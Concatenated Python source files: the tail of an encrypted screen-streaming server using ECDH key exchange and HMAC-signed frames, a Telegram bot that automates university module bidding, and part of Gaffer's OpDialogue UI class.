frame = pyautogui.screenshot()
# Convert it cv2 color format and np array
frame = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)
# Resize so we send consistent amount of data
frame = imutils.resize(frame, width=800)
# Stamp Frame with current time.
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime(
"%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
with lock:
outputFrame = frame.copy()
time.sleep(0.1)
# print("captured a screenshot")
# print(stream)
except UnidentifiedImageError as e:
quoted_filename = e.args[0].split()[4]
filename = quoted_filename.strip("'")
if os.path.exists(filename):
os.remove(filename)
main_logger.info("Deleted leftover temp image file")
except OSError as e:
if e.errno == 2:
main_logger.debug("During shutdown temp file was not written to disk, capture thread aborted")
pass
else:
raise e
def encrypt(key, plaintext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
encryptor = cipher.encryptor()
# Encrypt
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
return ciphertext
def decrypt(key, ciphertext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
decryptor = cipher.decryptor()
# Decrypt
deciphered_text = decryptor.update(ciphertext) + decryptor.finalize()
return deciphered_text
def generate_dh_key_pairs():
# Hard-coded p and g for DH Key exchange (RFC 3526 - group id 14)
global p, g
# Use our p and g with cryptography library
params_numbers = dh.DHParameterNumbers(p, g)
parameters = params_numbers.parameters(default_backend())
# Generate private and public key
host_private_key = parameters.generate_private_key()
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def generate_ecdh_key_pairs():
host_private_key = ec.generate_private_key(
ec.SECP384R1()
)
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER,
PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def encrypt_and_send_AES_OFB_message(client_socket, plaintext, key, iv):
ciphertext = encrypt(key, plaintext, iv)
client_socket.send(len(ciphertext).to_bytes(2, "big") + ciphertext)
def lookupIP(client_socket, public_key):
client_socket.send(b'1')
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
output = client_socket.recv(1024)
return output
def registerPublicKey(client_socket, public_key, private_key):
client_socket.send(b'0')
signed_public_key = sign(private_key, public_key)
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
client_socket.send(len(signed_public_key).to_bytes(2, "big") + signed_public_key)
output = client_socket.recv(1024)
return output
def sign(private_key, data):
signature = private_key.sign(
data,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
return signature
def verify(public_key, signature, message):
# Verify signature
public_key.verify(
signature,
message,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
async def new_client(reader, writer):
global lock, stream, outputFrame, serialized_RSA_server_public_key, RSA_server_private_key
global disable_ecdh, loop, restricted, trusted_keys_whitelist
main_logger = logging.getLogger("main")
client_logger = logging.getLogger("client")
addr = writer.get_extra_info('peername')
main_logger.info(f"Client connected: {addr}")
client_logger_extras = {'clientip': f"{addr[0]}", 'clientport': f"{addr[1]}"}
client_logger = logging.LoggerAdapter(client_logger, client_logger_extras)
try:
# --------- DH Key EXCHANGE START -----------##
if disable_ecdh:
host_private_key, host_public_key_enc = generate_dh_key_pairs()
else:
host_private_key, host_public_key_enc = generate_ecdh_key_pairs()
data = await reader.read(4)
size = None
serialized_RSA_client_public_key = None
abort = False
if data == b"HELO":
size = await reader.read(2)
serialized_RSA_client_public_key = await reader.read(int.from_bytes(size, "big"))
initial_message = (b"HELO" +
len(serialized_RSA_server_public_key).to_bytes(2, "big") +
serialized_RSA_server_public_key)
client_logger.debug(f"Public Key Received: {serialized_RSA_client_public_key}")
if restricted:
if serialized_RSA_client_public_key not in trusted_keys_whitelist:
client_logger.info("Rejecting client, not in whitelist")
initial_message = b"RJKT"
writer.write(initial_message)
await writer.drain()
abort = True
return
writer.write(initial_message)
await writer.drain()
else:
abort = True
return
data = await reader.read(5)
if data == b"DHINI" and not abort:
writer.write(len(host_public_key_enc).to_bytes(2, "big") + host_public_key_enc)
await writer.drain()
else:
abort = True
return
data = await reader.read(4)
if data == b"PUBK" and not abort:
# The ECDH Key
size = await reader.read(2)
remote_public_key_enc = await reader.read(int.from_bytes(size, "big"))
client_logger.debug(f"KeyExchange: Size of remote's public key: {int.from_bytes(size, 'big')}")
client_logger.debug(f"Remote's public key: {remote_public_key_enc}")
# The message signature
size = await reader.read(2)
remote_signature = await reader.read(int.from_bytes(size, "big"))
intended_message = (serialized_RSA_server_public_key +
serialized_RSA_client_public_key +
host_public_key_enc +
remote_public_key_enc)
verify(load_pem_public_key(serialized_RSA_client_public_key), remote_signature, intended_message)
client_logger.info("Message Verified")
# The host_signature to prove the intended public key was received
host_message = serialized_RSA_server_public_key + remote_public_key_enc
with lock:
host_signature = sign(RSA_server_private_key, host_message)
writer.write(len(host_signature).to_bytes(2, "big") + host_signature + b"DHFIN")
await writer.drain()
remote_public_key = load_der_public_key(remote_public_key_enc, default_backend())
if disable_ecdh:
shared_key = host_private_key.exchange(remote_public_key)
else:
shared_key = host_private_key.exchange(ec.ECDH(), remote_public_key)
# client_derived_keys_ivs[s] = (derived_key, derived_iv)
# --------- DH Key EXCHANGE END -----------##
derived_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'handshake data',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Key: {derived_key}")
derived_iv = HKDF(algorithm=hashes.SHA256(), length=16, salt=None, info=b'aes ofb iv',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived IV: {derived_iv}")
# HMAC key
derived_hmac_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'mac',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived HMAC Key: {derived_hmac_key}")
# Session ID
derived_session_id = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'session id',).derive(shared_key) # noqa: E501
client_logger.debug(f"Derived Session ID: {derived_session_id}")
component_id = 1
else:
abort = True
return
while stream and not abort:
data = await reader.read(1024)
if data == b'READY':
# print("got a READY")
with lock:
# print("got LOCK")
serializedFrame = pickle.dumps(outputFrame)
encr_serializedFrame = encrypt(derived_key, serializedFrame, derived_iv)
message = derived_session_id
bytes_component_id = component_id.to_bytes(4, "big")
message += bytes_component_id
# when width was 800
# 1200165 when aspect ratio was 16:10
# 1080165 when aspect ratio was 16:9
# print("len encr_serializedFrame")
# print(len(encr_serializedFrame))
message += struct.pack("Q", len(encr_serializedFrame))+encr_serializedFrame
# Make an hmac for message
h = hmac.HMAC(derived_hmac_key, hashes.SHA256())
h.update(message)
message_hmac = h.finalize()
message = message_hmac + message
# print("sending FRAME")
writer.write(message)
await writer.drain()
component_id += 1
elif data == b'LEAVING':
break
if outputFrame is not None:
pass
# # Show the image, debugging
# cv2.imshow('SERVER STREAMING VIDEO',outputFrame)
# # Way to close the feed, required for imshow to work properly
# key = cv2.waitKey(1) & 0xFF
# if key ==ord('q') or not stream:
# # client_socket.close()
# break
except KeyboardInterrupt:
client_logger.info("Client Task was canceled")
stream = False
loop.stop()
except asyncio.TimeoutError:
client_logger.info('Client Timed out')
except ConnectionResetError:
client_logger.info('Client left unexpectdly')
finally:
writer.close()
client_logger.info('Connection Closed')
async def boot_server(host_ip, port):
server = await asyncio.start_server(new_client, port=port, host=host_ip)
# async with server:
await server.serve_forever()
def str2bool(arg):
if isinstance(arg, bool):
return arg
if arg.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif arg.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError("Boolean value expected:\n\t'yes', 'true', 't', 'y', '1', 'no', 'false', 'f', 'n', '0'") # noqa: E501
if __name__ == '__main__':
# Setup Logging
main_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "Message":"%(message)s"}' # noqa: E501
main_logger = logging.getLogger("main")
main_logger_ch = logging.StreamHandler()
main_formatter = logging.Formatter(main_logger_Format)
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "ClientIP":"%(clientip)s", "ClientPort":"%(clientport)s", "Message":"%(message)s"}' # noqa: E501
client_logger = logging.getLogger("client")
client_logger_ch = logging.StreamHandler()
client_formatter = logging.Formatter(client_logger_Format)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
# Handle arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--host-ip", type=str, required=False,
help="ip address to serve on, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("-p", "--port", type=int, required=False,
help="port number to listen to, default: 9898", default=9898)
ap.add_argument("--pki-host-ip", type=str, required=False,
help="ip address of the PKI server to connect to, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("--pki-port", type=int, required=False,
help="PKI port number to connect to, default: 7777", default=7777)
ap.add_argument("--rsa-pub-key", type=str, required=False,
help="Path to RSA PEM public key, default: env/keys/server/public-key.pem",
default='env/keys/server/public-key.pem')
ap.add_argument("--rsa-priv-key", type=str, required=False,
help="Path to RSA PEM private key, default: env/keys/server/private-key.pem",
default='env/keys/server/private-key.pem')
ap.add_argument("--disable-ecdh", type=str2bool, required=False,
help="Disable Elliptic Curve key generation for Diffie-Hellman Key Exchange, default: False",
default=False)
ap.add_argument("--restricted", type=str2bool, required=False,
help="Enable restricted mode, requires --whitelist argument, default: False", default=False)
ap.add_argument("--whitelist", type=str, required=False,
help="Path to folder containing trusted public keys, default: env/keys/server/trusted_keys",
default="env/keys/server/trusted_keys")
ap.add_argument("-l", "--log-level", type=str, required=False,
help="Level of logging: info, debug, warning, error, default: warning", default='warning')
args = vars(ap.parse_args())
if (args["log_level"].lower() not in ["info", "warning", "debug", "error"]):
argparse.error('Unexpected log level entered. Valid choices are: info, error, warning, debug')
if args["log_level"].lower() == "info":
main_logger.setLevel(logging.INFO)
main_logger_ch.setLevel(logging.INFO)
client_logger.setLevel(logging.INFO)
client_logger_ch.setLevel(logging.INFO)
elif args["log_level"].lower() == "warning":
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
elif args["log_level"].lower() == "debug":
main_logger.setLevel(logging.DEBUG)
main_logger_ch.setLevel(logging.DEBUG)
client_logger.setLevel(logging.DEBUG)
client_logger_ch.setLevel(logging.DEBUG)
elif args["log_level"].lower() == "error":
main_logger.setLevel(logging.ERROR)
main_logger_ch.setLevel(logging.ERROR)
client_logger.setLevel(logging.ERROR)
client_logger_ch.setLevel(logging.ERROR)
main_logger_ch.setFormatter(main_formatter)
main_logger.addHandler(main_logger_ch)
client_logger_ch.setFormatter(client_formatter)
client_logger.addHandler(client_logger_ch)
if (args["restricted"] and args["whitelist"] == "env/keys/server/trusted_keys"):
main_logger.warning('The --restricted argument is being run with the default whitelist')
restricted = args["restricted"]
if args["restricted"]:
main_logger.info("Server is running in restricted mode, setting up whitelist...")
# For every file in whitelist directory
filenames = [f for f in os.listdir(args["whitelist"]) if os.path.isfile(os.path.join(args["whitelist"], f))]
# Load the public key and add it to whitelist
for pubkfile in filenames:
RSA_trusted_client_public_key = None
with open(os.path.join(args["whitelist"], pubkfile), "rb") as key_file:
RSA_trusted_client_public_key = load_pem_public_key(
key_file.read()
)
serialized_RSA_trsuted_client_public_key = RSA_trusted_client_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo) # noqa: E501
trusted_keys_whitelist[serialized_RSA_trsuted_client_public_key] = "Trusted"
main_logger.info(f"{len(trusted_keys_whitelist)} Public Key(s) loaded into whitelist")
main_logger.debug(f"trusted_keys_whitelist = {trusted_keys_whitelist}")
disable_ecdh = args["disable_ecdh"]
if disable_ecdh:
main_logger.info("ECDH is disabled, using DSA keys with Diffie-Hellman")
else:
main_logger.info("Using ECDH for key exchange")
RSA_server_public_key = None
RSA_server_private_key = None
with open(args["rsa_pub_key"], "rb") as key_file:
RSA_server_public_key = load_pem_public_key(
key_file.read()
)
with open(args["rsa_priv_key"], "rb") as key_file:
RSA_server_private_key = load_pem_private_key(
key_file.read(),
password=None,
)
# Serialize keys
serialized_RSA_server_public_key = RSA_server_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo)
# ## --------- PKI Register Pub Keys START-----------##
# pki_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# pki_host_ip = args["pki_host_ip"]
# pki_port = args["pki_port"]
# pki_client_socket.connect((pki_host_ip,pki_port))
# response = registerPublicKey(pki_client_socket, serialized_RSA_server_public_key, RSA_server_private_key)
# print("response:", response)
# pki_client_socket.close()
# ## --------- PKI Register Pub Keys END -----------##
main_logger.info("Setting up server...")
host_ip = args["host_ip"]
port = args["port"]
socket_address = (host_ip, port)
cap_frame_thread = threading.Thread(target=capture_frames, args=(), name='capture_frames', daemon=False)
cap_frame_thread.start()
threads = []
main_logger.info(f"LISTENING AT: {socket_address}")
loop = asyncio.get_event_loop()
loop.create_task(boot_server(host_ip, port))
try:
loop.run_forever()
except KeyboardInterrupt:
main_logger.info("Server is manually shutting down")
stream = False
cap_frame_thread.join()
finally:
main_logger.info("Shutting Down Server")
# try:
# loop.stop()
# loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# # loop.stop()
# pending = asyncio.all_tasks()
# for task in penging:
# task.cancel()
# with suppress(asyncio.CancelledError):
# loop.run_until_complete(task)
# # loop.stop()
# # loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# loop.stop()
# pending = asyncio.all_tasks()
# loop.run_until_complete(asyncio.gather(*pending))
try:
loop.stop()
pending = asyncio.all_tasks()
for task in pending:
task.cancel()
main_logger.debug("Lagging client task has been cancelled")
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
# loop.run_until_complete(asyncio.gather(*pending))
except RuntimeError as e:
if e.args[0] == 'no running event loop':
main_logger.debug("All Client Connections have been closed already")
pass
else:
raise e
|
bot.py
|
from telepot.loop import MessageLoop
import telepot
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
import time
from threading import Thread
from ActivateSelenium import bid
from key import token
activeUsers = {}
timeslots = {}
input_format = "%d/%m/%Y %H:%M"
precise_format = "%d/%m/%Y %H:%M:%S.0"
MAX_USERS = 2
class User:
def __init__(self):
self.state = 1
self.username = None
self.password = None
self.time = None
self.plan = "1"
def handle(msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if content_type == 'text':
if msg['text'] == '/about':
bot.sendMessage(chat_id, "This bot only stores your account details till it bids for you and they will be deleted afterwards. " \
"Your details will not be made known to anyone, including the person who made me (he is quite ethical). " \
"Only 2 people are able to use this bot to bid for modules at any timeslot. " \
"Please ensure that you have already planned out your modules on STARS Planner. " \
"Note that this bot does not guarantee a 100% success rate. " \
"To start, type '/bid'")
elif msg['text'] == '/bid' and (chat_id not in activeUsers):
activeUsers[chat_id] = User()
bot.sendMessage(chat_id, "Please key in your timeslot in this format DD/MM/YYYY HH:MM")
elif chat_id in activeUsers:
if msg['text'] == '/cancel':
bot.sendMessage(chat_id, "Cancelled. Please restart the process with '/bid'")
cleanUp(chat_id)
elif msg['text'] == '/edit' and activeUsers[chat_id].state > 1:
cleanUp(chat_id)
activeUsers[chat_id] = User()
bot.sendMessage(chat_id, "Please key in your timeslot in this format DD/MM/YYYY HH:MM")
elif activeUsers[chat_id].state == 1:
getTimeslot(chat_id, msg['text'])
elif activeUsers[chat_id].state == 2 or activeUsers[chat_id].state == 2.1 or activeUsers[chat_id].state == 2.2:
getAccountDetails(chat_id, msg['text'])
elif msg['text'] == '/edit' and activeUsers[chat_id].state == 3:
bot.sendMessage(chat_id, "Please give me your username")
activeUsers[chat_id].state = 2
else:
bot.sendMessage(chat_id, "Use '/bid' to start")
def getTimeslot(chat_id, text):
if checkText(text): # if valid
precise_dt = datetime.strptime(text, input_format).strftime(precise_format) #change M to MM and add Seconds and ms precision
if precise_dt in timeslots:
if len(timeslots[precise_dt]) == MAX_USERS:
bot.sendMessage(chat_id, "Your selected timeslot is full. Please restart the process with '/bid'")
del activeUsers[chat_id]
else:
timeslots[precise_dt].append(chat_id)
activeUsers[chat_id].state = 2
activeUsers[chat_id].time = precise_dt
bot.sendMessage(chat_id, "Please give me your username")
else: # if not in dict of timeslots
timeslots[precise_dt] = [chat_id]
activeUsers[chat_id].state = 2
activeUsers[chat_id].time = precise_dt
bot.sendMessage(chat_id, "Please give me your username")
else:
bot.sendMessage(chat_id, "Please follow the input format DD/MM/YYYY HH:MM") #if invalid
def checkText(text):
try:
datetime.strptime(text, input_format)
return True
except ValueError:
return False
def getAccountDetails(chat_id, text):
if activeUsers[chat_id].state == 2:
activeUsers[chat_id].username = text
bot.sendMessage(chat_id, "Please give me your password")
activeUsers[chat_id].state = 2.1
elif activeUsers[chat_id].state == 2.1:
activeUsers[chat_id].password = text
bot.sendMessage(chat_id, "Which Plan should I bid for?")
activeUsers[chat_id].state = 2.2
elif activeUsers[chat_id].state == 2.2:
if text.isnumeric() and (int(text)<= 3 and int(text)>=1):
activeUsers[chat_id].plan = text
bot.sendMessage(chat_id, "Got it. I will notify you when it is done")
activeUsers[chat_id].state = 3
else:
bot.sendMessage(chat_id, "Please input a number from 1 to 3")
def cleanUp(chat_id):
target_time = activeUsers[chat_id].time
target_index = timeslots[target_time].index(chat_id)
del timeslots[target_time][target_index]
if len(timeslots[target_time]) == 0:
del timeslots[target_time]
del activeUsers[chat_id]
def getUsersAtTimeslot(time):
chat_ids = timeslots[time]
users = []
for chat_id in chat_ids:
users.append(activeUsers[chat_id])
return chat_ids, users
def finishBid(chat_ids, messages, look_ahead, flags):
for index in range(len(chat_ids)):
if not flags[index]:
bot.sendMessage(chat_ids[index], messages[index][messages[index].find("{")+1:-1])
else:
soup = BeautifulSoup(messages[index], 'html.parser').find("div", {"id": "ui_body_container"})
# 1st message
tr_list = soup.find_all('tr')[2:-1]
td_list = []
for el in tr_list:
td_list.append(str(el.find_all('td')))
for el in td_list:
text = el.split('\n')
new_text = []
for i in text:
if i[0] != "<" and i[-1]!=">":
new_text.append(i)
new_text[0] = "Index: "+new_text[0]+","
new_text[1] = "Course: "+new_text[1]+","
new_text[2] = "Title: "+new_text[2]+","
new_text[3] = "AUs: "+new_text[3]+","
new_text[4] = "Type: "+new_text[4]+","
new_text[5] = "Choice: "+new_text[5]+","
new_text.append(text[-2])
new_text[6] = "Remark: "+new_text[6]
bot.sendMessage(chat_ids[index], " ".join(new_text))
# 2nd message
last_row = soup.find_all('tr')[-1].text.split("\n")
new_last_row = []
for el in last_row:
if el != '' and el != '\xa0':
new_last_row.append(el)
del last_row
new_last_row = new_last_row[1:]
new_last_row[0] = new_last_row[0]+","
new_last_row[-1] = "Total AUs: "+new_last_row[-1]
bot.sendMessage(chat_ids[index], " ".join(new_last_row))
del activeUsers[chat_ids[index]]
del timeslots[look_ahead]
if __name__ == "__main__":
bot = telepot.Bot(token)
MessageLoop(bot, handle).run_as_thread()
print("Listening ...")
while 1:
look_ahead = (datetime.now()+timedelta(seconds=25)).strftime(precise_format) # 25 seconds before target time
if look_ahead in timeslots:
chat_ids, users = getUsersAtTimeslot(look_ahead)
threads = [None]*MAX_USERS
messages = ["error"]*MAX_USERS
flags = [None]*MAX_USERS
for i in range(len(chat_ids)):
threads[i] = Thread(target=bid(users[i], look_ahead, messages, flags, i))
threads[i].start()
finishBid(chat_ids, messages, look_ahead, flags)
del threads, messages, flags
time.sleep(0.1)
|
OpDialogue.py
|
##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import threading
import traceback
import imath
import IECore
import Gaffer
import GafferUI
import GafferCortex
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None_", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None_", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = GafferCortex.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( imath.V2i( 1 ), parenting = { "expand" : True } )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None_,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( imath.V2i( 250, 1 ), parenting = { "expand" : True } )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged )
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signal2()
self.__opExecutedSignal = Gaffer.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__close ) )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateExecution ) )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception as e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
